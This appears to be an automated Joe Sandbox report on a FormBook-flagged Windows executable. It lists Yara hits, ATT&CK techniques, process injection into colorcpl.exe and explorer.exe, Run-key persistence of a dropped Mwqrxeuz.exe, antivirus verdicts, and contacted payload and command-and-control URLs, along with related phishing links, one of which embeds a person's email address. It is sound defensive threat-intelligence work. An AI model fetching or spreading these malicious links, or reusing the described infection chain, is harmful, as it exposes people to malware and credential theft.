          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          Registry Run Keys / Startup Folder          		812
          Process Injection          		1
          Masquerading          		1
          Input Capture          		1
          System Time Discovery          		Remote Services1
          Input Capture          		Exfiltration Over Other Network Medium11
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default Accounts1
          Shared Modules          		1
          DLL Side-Loading          		1
          Registry Run Keys / Startup Folder          		1
          Virtualization/Sandbox Evasion          		LSASS Memory221
          Security Software Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth2
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)1
          DLL Side-Loading          		812
          Process Injection          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Deobfuscate/Decode Files or Information          		NTDS3
          Process Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Software Packing          		Cached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync114
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756155 Sample: 0321423605241625.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 36 www.thecuratedpour.com 2->36 38 www.segurofunerarioar.com 2->38 40 7 other IPs or domains 2->40 56 Snort IDS alert for network traffic 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for URL or domain 2->60 62 6 other signatures 2->62 11 0321423605241625.exe 1 18 2->11         started        signatures3 process4 dnsIp5 42 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49708 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->42 44 ppqfqw.ph.files.1drv.com 11->44 46 2 other IPs or domains 11->46 32 C:\Users\Public\Libraries\Mwqrxeuz.exe, PE32 11->32 dropped 34 C:\Users\...\Mwqrxeuz.exe:Zone.Identifier, ASCII 11->34 dropped 74 Writes to foreign memory regions 11->74 76 Allocates memory in foreign processes 11->76 78 Creates a thread in another existing process (thread injection) 11->78 80 Injects a PE file into a foreign processes 11->80 16 colorcpl.exe 2 11->16         started        file6 signatures7 process8 signatures9 48 Modifies the context of a thread in another process (thread injection) 16->48 50 Maps a DLL or memory area into another process 16->50 52 Sample uses process hollowing technique 16->52 54 2 other signatures 16->54 19 explorer.exe 4 2 16->19 injected process10 process11 21 Mwqrxeuz.exe 19->21         started        24 raserver.exe 19->24         started        signatures12 64 Antivirus detection for dropped file 21->64 66 Multi AV Scanner detection for dropped file 21->66 68 Machine Learning detection for dropped file 21->68 26 colorcpl.exe 21->26         started        70 Maps a DLL or memory area into another process 24->70 72 Tries to detect virtualization through RDTSC time measurements 24->72 28 cmd.exe 1 24->28         started        process13 process14 30 conhost.exe 28->30         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          0321423605241625.exe36%ReversingLabsWin32.Trojan.Generic
          0321423605241625.exe41%VirustotalBrowse
          0321423605241625.exe100%AviraHEUR/AGEN.1214697
          0321423605241625.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\Libraries\Mwqrxeuz.exe100%AviraHEUR/AGEN.1214697
          C:\Users\Public\Libraries\Mwqrxeuz.exe100%Joe Sandbox ML
          C:\Users\Public\Libraries\Mwqrxeuz.exe36%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.colorcpl.exe.10410000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.0321423605241625.exe.400000.0.unpack100%AviraHEUR/AGEN.1214697Download File
          0.2.0321423605241625.exe.2170000.0.unpack100%AviraTR/Hijacker.GenDownload File
          1.0.colorcpl.exe.10410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.525796c.4.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
          1.0.colorcpl.exe.10410000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.colorcpl.exe.10410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          9.2.raserver.exe.a3cda0.1.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
          0.2.0321423605241625.exe.3baeed8.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.Mwqrxeuz.exe.2598248.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.0.colorcpl.exe.10410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.0321423605241625.exe.2231218.1.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.0321423605241625.exe.2278248.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          www.rematedeldia.com/euv4/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.kuechenpruefer.com
          		217.160.0.95
          		truetrue
            		unknown
            librairie-adrienne.com
            		192.0.78.141
            		truetrue
              		unknown
              l-0003.l-dc-msedge.net
              		13.107.43.12
              		truefalse
                		unknown
                www.customapronsnow.com
                		52.85.92.84
                		truetrue
                  		unknown
                  shops.myshopify.com
                  		23.227.38.74
                  		truefalse
                    		unknown
                    www.thecuratedpour.com
                    		unknown
                    		unknowntrue
                      		unknown
                      onedrive.live.com
                      		unknown
                      		unknownfalse
                        		high
                        www.segurofunerarioar.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.librairie-adrienne.com
                          		unknown
                          		unknowntrue
                            		unknown
                            ppqfqw.ph.files.1drv.com
                            		unknown
                            		unknownfalse
                              		high
                              www.rematedeldia.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                www.rematedeldia.com/euv4/true
                                • Avira URL Cloud: malware
                                		low
                                https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npofalse
                                  		high
                                  https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1false
                                    		high

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O30321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://ppqfqw.ph.files.1drv.com/U00321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ppqfqw.ph.files.1drv.com/0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ppqfqw.ph.files.1drv.com/_0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://onedrive.live.com/0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ppqfqw.ph.files.1drv.com/s0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      13.107.43.12
                                                      		l-0003.l-dc-msedge.netUnited States
                                                      		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:756155
                                                      Start date and time:2022-11-29 18:23:06 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 2s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Sample file name:0321423605241625.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                      Number of analysed new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@11/5@8/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 98.9% (good quality ratio 86.8%)
                                                      • Quality average: 75%
                                                      • Quality standard deviation: 33.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 50
                                                      • Number of non-executed functions: 180
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.42.13
                                                      • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      18:23:59API Interceptor1x Sleep call for process: 0321423605241625.exe modified
                                                      18:24:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
                                                      18:24:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
                                                      18:24:18API Interceptor1x Sleep call for process: Mwqrxeuz.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      13.107.43.12SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exeGet hashmaliciousBrowse
                                                        000211232334_33455INVOICE .vbsGet hashmaliciousBrowse
                                                          IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Win32.Malware-gen.5701.3804.exeGet hashmaliciousBrowse
                                                              Swift Payment Copy .xla.exeGet hashmaliciousBrowse
                                                                03231262773662516627.exeGet hashmaliciousBrowse
                                                                  Cogigqkbkuvzlh.exeGet hashmaliciousBrowse
                                                                    Inquiry For RE UGS - LCL - INDONESIA.exeGet hashmaliciousBrowse
                                                                      AZ032441352671726.exeGet hashmaliciousBrowse
                                                                        CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exeGet hashmaliciousBrowse
                                                                          Requisition Order.exeGet hashmaliciousBrowse
                                                                            Delivery report.exeGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Win32.Evo-gen.7732.16870.exeGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exeGet hashmaliciousBrowse
                                                                                  Huat Tradings - Products Inquiry.exeGet hashmaliciousBrowse
                                                                                    Products Inquiry_Document.exeGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exeGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exeGet hashmaliciousBrowse
                                                                                          Invoice Overdue & Error INV NR 522236562 DTD 25.10.2021 SK.exeGet hashmaliciousBrowse
                                                                                            PRODUCTS LIST & DESIGN.exeGet hashmaliciousBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              www.kuechenpruefer.com045624132441524.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Prilozena nova objednavka.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              SK034252562672.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Izvod racuna.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              New order list.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Deklarata e llogarise.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Proforma Fatura ektedir.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Nueva orden de compra.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              Copia de pago bancario.exeGet hashmaliciousBrowse
                                                                                              • 217.160.0.95
                                                                                              l-0003.l-dc-msedge.netSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.Trojan-gen.31819.28757.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              000211232334_33455INVOICE .vbsGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              IMG_2022112022-6468.vbsGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.Malware-gen.5701.3804.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Swift Payment Copy .xla.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              03231262773662516627.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Cogigqkbkuvzlh.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Inquiry For RE UGS - LCL - INDONESIA.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              AZ032441352671726.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              CONFD-31 PROPOSED VILLA (B+G+1+PH) + MAJLIS .exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Requisition Order.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              PRODUCTS_PROFILE.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Delivery report.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.Evo-gen.7732.16870.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Variant.Tedy.237947.19482.16084.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Huat Tradings - Products Inquiry.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Products Inquiry_Document.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Variant.Ransom.Gendarmerie.22.23590.8978.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              SecuriteInfo.com.Win32.PWSX-gen.19083.21703.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSFwd_ Payment_Confirmation.msgGet hashmaliciousBrowse
                                                                                              • 13.107.213.45
                                                                                              PDF.shtmlGet hashmaliciousBrowse
                                                                                              • 13.107.219.60
                                                                                              https://theflyinghightrust-my.sharepoint.com/:o:/g/personal/jsmart_hucknallfha_co_uk/EsdKhSjw70NEkM9oQwlErQkB7sp2SRKSx0keheJYeDkk2w?e=ilRkCLGet hashmaliciousBrowse
                                                                                              • 13.89.179.9
                                                                                              Notification Details.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.246.60
                                                                                              http://url4483.sosadiazeventos.com/ls/click?upn=mXPGTXlLlQcgRVh-2F4Dp38fDRGJMmpWDEH-2FE76VgzzHi8nDM-2FDFm088Y0fZh2YEo3qbCf_fJCV5gLuaP5-2B7UCkl8vmUj8dC4C9Y4dg1tvjDkrKvY5UHarI7EGwbOBMpE-2F-2BTDbMTeAQqiCIplw1OEed2ml5geiDyCAjnFVFwD7rEXflsrU-2FDtPiBmvBUcn9oohKUiNRFALv-2B8n9tEJ8XP-2Bi8ehDveJ4shY6zR5k78j6VeP8An8lQFfJ6kmEWKqICZhGlO0fhkepKLO1yzpGTF9YmHbAGNDbmtf6HwQ7g1ug0zWgxA8-3DGet hashmaliciousBrowse
                                                                                              • 20.190.159.4
                                                                                              robinbot_sample2Get hashmaliciousBrowse
                                                                                              • 51.110.98.238
                                                                                              https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652Get hashmaliciousBrowse
                                                                                              • 204.79.197.200
                                                                                              https://libertymutual-my.sharepoint.com/:u:/p/avrial_cloud/Ef8voSU0ijFBkCGrbzr79P0B5chArPhF10rZzMyHQ8-awQ?email=jmiller%40wickersmith.com&e=nYNYdbGet hashmaliciousBrowse
                                                                                              • 13.107.136.8
                                                                                              robinbotGet hashmaliciousBrowse
                                                                                              • 21.237.201.27
                                                                                              Check#03452.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.219.60
                                                                                              robinbotGet hashmaliciousBrowse
                                                                                              • 22.253.251.152
                                                                                              Agmyifoqpppqql.exeGet hashmaliciousBrowse
                                                                                              • 20.171.84.250
                                                                                              Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.246.60
                                                                                              Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.219.45
                                                                                              https://theflyinghightrust-my.sharepoint.com/:o:/g/personal/jsmart_hucknallfha_co_uk/EsdKhSjw70NEkM9oQwlErQkB7sp2SRKSx0keheJYeDkk2w?e=ilRkCLGet hashmaliciousBrowse
                                                                                              • 20.135.20.1
                                                                                              New_Financia1_Report.htmGet hashmaliciousBrowse
                                                                                              • 13.107.237.60
                                                                                              New_Financia1_Report.htmGet hashmaliciousBrowse
                                                                                              • 13.107.219.45
                                                                                              PXXvSes14Z.exeGet hashmaliciousBrowse
                                                                                              • 20.189.173.20
                                                                                              Eurial DOCS.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.238.45
                                                                                              Policy handbook.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.219.60

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                              37f463bf4616ecd445d4a1937da06e19PDF.shtmlGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Notification Details.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://schemevolcanosuspicions.comGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              ojPXdB4WTz.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fpostsign.web.app/r9s0h3lind07rhinda51arn0h3ldr9slarkd07r9s0h3nW1&c=92652Get hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://bafybeiajl7jy5rq7cttxjilmyeun7jxorxidbcrh6td4a5z6om7jqgofiq.ipfs.w3s.link/meuro4elpez_cham-e.html#glenergy@glenergy.comGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://libertymutual-my.sharepoint.com/:u:/p/avrial_cloud/Ef8voSU0ijFBkCGrbzr79P0B5chArPhF10rZzMyHQ8-awQ?email=jmiller%40wickersmith.com&e=nYNYdbGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Check#03452.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              http://opencuny.org/Get hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://itb.tc/MTI2Mjk0OTI0OQ==ibmxWjJWdUxYQmhaMlY0TFRFeU5UQXdOakEyT0RGcFptVjBZMmg0YTNCaGNuTnNiM2RwYzJWamRYSmxaSGhqWlc1MGNtRnNNUzVqYjIwPQ==Get hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              Revised Policy Benefits.htmlGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              VeohWebPlayerSetup_eng.exeGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://protect-za.mimecast.com/s/uPmFCMjBBwFvRZPBIwJQlBT?domain=s3.amazonaws.comGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              https://theflyinghightrust-my.sharepoint.com/:o:/g/personal/jsmart_hucknallfha_co_uk/EsdKhSjw70NEkM9oQwlErQkB7sp2SRKSx0keheJYeDkk2w?e=ilRkCLGet hashmaliciousBrowse
                                                                                              • 13.107.43.12
                                                                                              New_Financia1_Report.htmGet hashmaliciousBrowse
